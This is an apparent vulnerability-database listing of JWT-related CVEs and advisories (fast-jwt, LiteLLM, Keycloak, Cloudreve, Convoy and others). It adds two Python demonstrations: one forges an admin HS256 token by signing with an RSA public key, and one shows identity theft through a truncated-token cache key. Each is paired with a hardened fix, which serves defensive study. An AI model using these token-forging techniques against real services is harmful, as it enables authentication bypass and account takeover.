Lucene search
1576 matches found

Cvelist
added 2026/04/06 3:54 p.m., 26 views

CVE-2026-34950 fast-jwt has an incomplete fix for CVE-2023-48223: JWT Algorithm Confusion via Whitespace-Prefixed RSA Public Key

fast-jwt provides a fast JSON Web Token (JWT) implementation. In 6.1.0 and earlier, the publicKeyPemMatcher regex in fast-jwt/src/crypto.js uses a ^ anchor that is defeated by any leading whitespace in the key string, re-enabling the exact same JWT algorithm confusion attack that CVE-2023-48223 patch...

CVSS 9.1, EPSS 0.00235
Exploits: 1, References: 1
CVE
added 2026/04/06 3:54 p.m., 13 views

CVE-2026-34950

CVE-2026-34950 affects the fast-jwt library (6.1.0 and earlier). The publicKeyPemMatcher in fast-jwt/src/crypto.js uses an anchored regex starting with ^, which is defeated by any leading whitespace in the key string. This misclassifies RSA public keys with leading whitespace, allowing an attacke...

CVSS 9.1, AI score 6.2, EPSS 0.00235
Exploits: 1, References: 1, Affected Software: 1
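The two fast-jwt entries above describe a key-classification regex anchored with ^ that does not match a PEM public key carrying leading whitespace, so the key falls through to the symmetric-secret path and an HS256 token signed with the public key bytes verifies. The following is an added Python example, not fast-jwt's code: the matchers are hypothetical stand-ins for publicKeyPemMatcher (the real pattern is not reproduced), the PEM text is constructed and not a usable key, and RSA verification is deliberately not modelled; the example only shows the classification decision and its consequence. It assumes the attacker knows the public key and can guess the whitespace variant of the configured key string.

```python
import base64
import hashlib
import hmac
import json
import re
from typing import Optional

# Constructed, non-functional PEM text standing in for the server's RSA public key
# (assumption: the attacker knows it, since public keys are normally published).
PUBLIC_KEY_PEM = (
    "-----BEGIN PUBLIC KEY-----\n"
    "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAconstructedExampleKeyMaterial\n"
    "-----END PUBLIC KEY-----\n"
)

# Hypothetical matchers, not fast-jwt's publicKeyPemMatcher: the first is anchored
# at position 0 and misses a key that starts with whitespace; the second tolerates it.
ANCHORED_PEM_MATCHER = re.compile(r"^-----BEGIN (?:RSA )?PUBLIC KEY-----")
HARDENED_PEM_MATCHER = re.compile(r"^\s*-----BEGIN (?:RSA )?PUBLIC KEY-----")


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(payload: dict, secret: bytes) -> str:
    """Mint an HS256 token; the attacker calls this with the public key bytes as secret."""
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = b64url(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(secret, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{b64url(sig)}"


def verify(token: str, key: str, matcher: re.Pattern) -> Optional[dict]:
    """Model of the decision the advisory describes: a key the matcher classifies as a
    PEM public key must never be used as an HMAC secret; any other key string is treated
    as the HS256 secret. Only HS256 tokens are verified here; RSA verification is out of
    scope, so a correctly classified public key simply rejects the HS256 token."""
    try:
        header_b64, body_b64, sig_b64 = token.split(".")
        header = json.loads(b64url_decode(header_b64))
    except ValueError:
        return None
    if matcher.match(key):
        return None  # public key configured: an HS* token must be refused
    if header.get("alg") != "HS256":
        return None
    expected = hmac.new(key.encode(), f"{header_b64}.{body_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        return None
    return json.loads(b64url_decode(body_b64))


def algorithm_confusion_demo(key_as_configured: str) -> dict:
    """Forge a token using the configured key string as the HMAC secret and report
    whether each matcher lets it through. Returns {"anchored": bool, "hardened": bool}."""
    forged = sign_hs256({"sub": "admin", "role": "superuser"}, key_as_configured.encode())
    return {
        "anchored": verify(forged, key_as_configured, ANCHORED_PEM_MATCHER) is not None,
        "hardened": verify(forged, key_as_configured, HARDENED_PEM_MATCHER) is not None,
    }


if __name__ == "__main__":
    # Key loaded with a leading space (e.g. from a YAML or env value): the anchored
    # matcher misclassifies it as a secret and the forged HS256 token is accepted.
    print(algorithm_confusion_demo(" " + PUBLIC_KEY_PEM))  # {'anchored': True, 'hardened': False}
    # Same key without whitespace: both matchers classify it as a public key.
    print(algorithm_confusion_demo(PUBLIC_KEY_PEM))        # {'anchored': False, 'hardened': False}
```

The practical check this suggests for any library that picks the algorithm family from the shape of the key: feed it the public key with a leading space, tab and newline and confirm an HS256 token signed with those exact bytes is still rejected.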
NVD
added 2026/04/06 9:16 a.m., 1 views

CVE-2026-37977

A flaw was found in Keycloak. A remote attacker can exploit a Cross-Origin Resource Sharing (CORS) header injection vulnerability in Keycloak's User-Managed Access (UMA) token endpoint. This flaw occurs because the azp claim from a client-supplied JSON Web Token (JWT) is used to set the...

CVSS 5.3, EPSS 0.00229
Exploits: 0, References: 4
Cvelist
added 2026/04/06 4:30 a.m., 30 views

CVE-2026-5622 hcengineering Huly Platform JWT Token token.ts hard-coded key

A vulnerability was determined in hcengineering Huly Platform 0.7.382. Affected by this issue is some unknown functionality of the file foundations/core/packages/token/src/token.ts of the component JWT Token Handler. This manipulation of the argument SERVERSECRET with the input secret causes use ...

CVSS 6.3, EPSS 0.00255
Exploits: 0, References: 3
Vulnrichment
added 2026/04/06 4:30 a.m., 3 views

CVE-2026-5622 hcengineering Huly Platform JWT Token token.ts hard-coded key

A vulnerability was determined in hcengineering Huly Platform 0.7.382. Affected by this issue is some unknown functionality of the file foundations/core/packages/token/src/token.ts of the component JWT Token Handler. This manipulation of the argument SERVERSECRET with the input secret causes use ...

CVSS 6.3, AI score 5.3, EPSS 0.00255
Exploits: 0, References: 3
Positive Technologies
added 2026/04/06 12:00 a.m., 2 views

PT-2026-30582

Name of the Vulnerable Software and Affected Versions: Keycloak (affected versions not specified). Description: A flaw exists in Keycloak that allows a remote attacker to exploit a Cross-Origin Resource Sharing (CORS) header injection in the User-Managed Access (UMA) token endpoint. The issue arises becau...

CVSS 5.3, AI score 5.3, EPSS 0.00229
Exploits: 0, References: 10
CNNVD
added 2026/04/06 12:00 a.m., 4 views

LiteLLM authorization vulnerability

LiteLLM is an open-source application developed by Berri AI. It allows for the invocation of all LLM APIs in the OpenAI format. Prior to version 1.83.0, LiteLLM had an authorization vulnerability. This vulnerability stemmed from the use of token[:20] as a cache key when JWT authentication was...

CVSS 9.4, AI score 5.8, EPSS 0.00395
Exploits: 1, References: 1
CNNVD
added 2026/04/06 12:00 a.m., 4 views

fast-jwt security vulnerability

fast-jwt is a JSON Web Token implementation open-sourced by Nearform. Versions of fast-jwt up to 6.1.0 contained a security vulnerability, which stemmed from the lack of verification of the crit header parameter. This allowed tokens containing unknown extensions to be accepted...

CVSS 7.5, AI score 5.7, EPSS 0.00155
Exploits: 1, References: 2
GithubExploit
added 2026/04/05 1:18 p.m., 84 views

GuvenliWebYazilimiGelistirme-CipherNone-

🛡️ CipherNone: JWT "alg: none" Vulnerability & Hardening Lab...

AI score 5.9
Exploits: 0
GithubExploit
added 2026/04/05 8:11 a.m., 120 views

JWT-PHANTOM

No d...

AI score 5.9
Exploits: 0
Veracode
added 2026/04/04 5:31 a.m., 4 views

Authentication Bypass

litellm is vulnerable to Authentication Bypass. The vulnerability is due to weak cache key generation using only the first 20 characters of JWT tokens, which allows an attacker to craft a token with a matching prefix and gain unauthorized access by inheriting another user's identity...

CVSS 9.4, AI score 5.8, EPSS 0.00395
Exploits: 1, References: 2, Affected Software: 1
Positive Technologies
added 2026/04/04 12:00 a.m., 3 views

PT-2026-30318

Summary: The file lightrag/api/config.py line 397 uses a default JWT secret "lightrag-jwt-default-secret" when the TOKEN SECRET environment variable is not set. The AuthHandler in lightrag/api/auth.py lines 24-25 uses this secret to sign and verify tokens. An unauthenticated attacker can forge...

CVSS 7.5, AI score 5.9, EPSS 0.0012
Exploits: 0, References: 4
Github Security Blog
added 2026/04/03 9:59 p.m., 11 views

LiteLLM: Authentication bypass via OIDC userinfo cache key collision

Impact: When JWT authentication is enabled (enablejwtauth: true), the OIDC userinfo cache uses token[:20] as the cache key. JWT headers produced by the same signing algorithm generate identical first 20 characters. This configuration option is not enabled by default. Most instances are not affected. A...

CVSS 9.4, AI score 5.9, EPSS 0.00395
Exploits: 1, References: 3, Affected Software: 1
NVD
added 2026/04/03 8:16 p.m., 4 views

CVE-2026-25726

Cloudreve is a self-hosted file management and sharing system. Prior to version 4.13.0, the application uses the weak pseudo-random number generator math/rand seeded with time.Now().UnixNano() to generate critical security secrets, including the secretkey and hashidsalt. These secrets are generated...

CVSS 9.8, EPSS 0.00376
Exploits: 0, References: 2
Snyk
added 2026/04/03 2:54 a.m., 2 views

Denial of Service (DoS)

Overview: openclaw is a 🦞 OpenClaw — Personal AI Assistant. Affected versions of this package are vulnerable to Denial of Service (DoS) via the MS Teams webhook process. An attacker can cause resource exhaustion by sending unauthenticated requests that are parsed before proper JWT validation. Details...

CVSS 8.7, AI score 5.9
Exploits: 0, References: 2
Snyk
added 2026/04/03 2:54 a.m., 2 views

Denial of Service (DoS)

Overview: @openclaw/msteams is an OpenClaw Microsoft Teams channel plugin. Affected versions of this package are vulnerable to Denial of Service (DoS) via the MS Teams webhook process. An attacker can cause resource exhaustion by sending unauthenticated requests that are parsed before proper JWT...

CVSS 8.7, AI score 5.8
Exploits: 0, References: 2
Github Security Blog
added 2026/04/03 2:54 a.m., 2 views

OpenClaw: MS Teams webhook parses body before JWT validation, enabling unauthenticated resource exhaustion

Summary: MS Teams webhook parses body before JWT validation, enabling unauthenticated resource exhaustion. Current Maintainer Triage: Status: open; Normalized severity: medium; Assessment: v2026.3.28 still parses Teams JSON after only a Bearer-prefix gate and before real JWT validation, and the...

CVSS 8.7, AI score 5.9, EPSS 0.00481
Exploits: 0, References: 6, Affected Software: 1
Positive Technologies
added 2026/04/03 12:00 a.m., 4 views

PT-2026-30279

Name of the Vulnerable Software and Affected Versions: LiteLLM versions prior to 1.83.0. Description: A critical authentication bypass can occur in LiteLLM when JWT authentication is enabled, due to an OIDC userinfo cache key collision. The OIDC userinfo cache uses the first 20 characters of the tok...

CVSS 9.4, AI score 5.9, EPSS 0.00395
Exploits: 1, References: 9
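The four LiteLLM entries (CNNVD, Veracode, Github Security Blog and PT-2026-30279) all describe the same mechanism: the OIDC userinfo cache is keyed on the first 20 characters of the bearer token, and every JWT with the same header shares far more than 20 leading characters. The following is an added Python example, not LiteLLM's code. It builds two constructed JWT-shaped tokens with identical headers and different subjects, measures their shared prefix, and runs a stand-in cache once with a prefix key and once with a full-token hash key. The userinfo call is a constructed stand-in that reads sub from the token; the example assumes the attacker holds any token with the same header, for instance one legitimately issued to their own account.

```python
import base64
import hashlib
import json
from typing import Callable, Dict, Tuple


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def unsigned_token(header: dict, payload: dict) -> str:
    """Constructed JWT-shaped string; the signature is a placeholder because the
    cache-key weakness does not depend on it."""
    h = b64url(json.dumps(header, separators=(",", ":")).encode())
    p = b64url(json.dumps(payload, separators=(",", ":")).encode())
    return f"{h}.{p}.placeholder-signature"


# Both tokens come from the same issuer and algorithm, so the header segment is identical.
HEADER = {"alg": "RS256", "typ": "JWT"}
VICTIM_TOKEN = unsigned_token(HEADER, {"sub": "alice", "email": "alice@example.org"})
ATTACKER_TOKEN = unsigned_token(HEADER, {"sub": "mallory", "email": "mallory@example.org"})


def common_prefix_len(a: str, b: str) -> int:
    """How many leading characters two tokens share (the header alone gives 36 here)."""
    n = 0
    for x, y in zip(a, b):
        if x != y:
            break
        n += 1
    return n


def weak_cache_key(token: str) -> str:
    # The pattern the advisories describe: only the first 20 characters are used.
    return token[:20]


def strong_cache_key(token: str) -> str:
    # Hardened: hash the whole token so distinct tokens cannot collide on a prefix.
    return hashlib.sha256(token.encode()).hexdigest()


def subject_from_token(token: str) -> str:
    """Constructed stand-in for the OIDC userinfo request: returns the identity the
    identity provider would report for this token."""
    body = token.split(".")[1]
    return json.loads(base64.urlsafe_b64decode(body + "=" * (-len(body) % 4)))["sub"]


class UserinfoCache:
    def __init__(self, key_fn: Callable[[str], str]) -> None:
        self._key_fn = key_fn
        self._store: Dict[str, str] = {}
        self.fetches = 0  # how many real userinfo lookups happened

    def userinfo(self, token: str) -> str:
        k = self._key_fn(token)
        if k not in self._store:
            self.fetches += 1
            self._store[k] = subject_from_token(token)
        return self._store[k]


def simulate(key_fn: Callable[[str], str]) -> Tuple[str, str]:
    """Victim authenticates first and warms the cache; the attacker then presents
    their own token. Returns (identity seen by victim, identity handed to attacker)."""
    cache = UserinfoCache(key_fn)
    victim_identity = cache.userinfo(VICTIM_TOKEN)
    attacker_identity = cache.userinfo(ATTACKER_TOKEN)
    return victim_identity, attacker_identity


if __name__ == "__main__":
    print(common_prefix_len(VICTIM_TOKEN, ATTACKER_TOKEN))  # well above 20
    print(simulate(weak_cache_key))    # ('alice', 'alice'): attacker inherits alice
    print(simulate(strong_cache_key))  # ('alice', 'mallory')
```

Keying on a truncated token is the general mistake, not a LiteLLM-specific one: any cache in front of an identity lookup has to be keyed on something that is unique per credential, which for a bearer token means the whole token or a digest of it.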
CNNVD
added 2026/04/03 12:00 a.m., 2 views

Cloudreve security feature vulnerability

Cloudreve is an open-source public cloud file system that supports multiple cloud storage drivers. Versions of Cloudreve prior to 4.13.0 have a security feature vulnerability. This vulnerability stems from the use of a weak pseudo-random number generator for generating security keys, which may le...

CVSS 9.8, AI score 5.8, EPSS 0.00376
Exploits: 0, References: 3
NVD
added 2026/04/02 4:16 p.m., 4 views

CVE-2026-33746

Convoy is a KVM server management panel for hosting businesses. From version 3.9.0-beta to before version 4.5.1, the JWTService::decode method did not verify the cryptographic signature of JWT tokens. While the method configured a symmetric HMAC-SHA256 signer via lcobucci/jwt, it only validated...

CVSS 9.8, EPSS 0.003
Exploits: 0, References: 2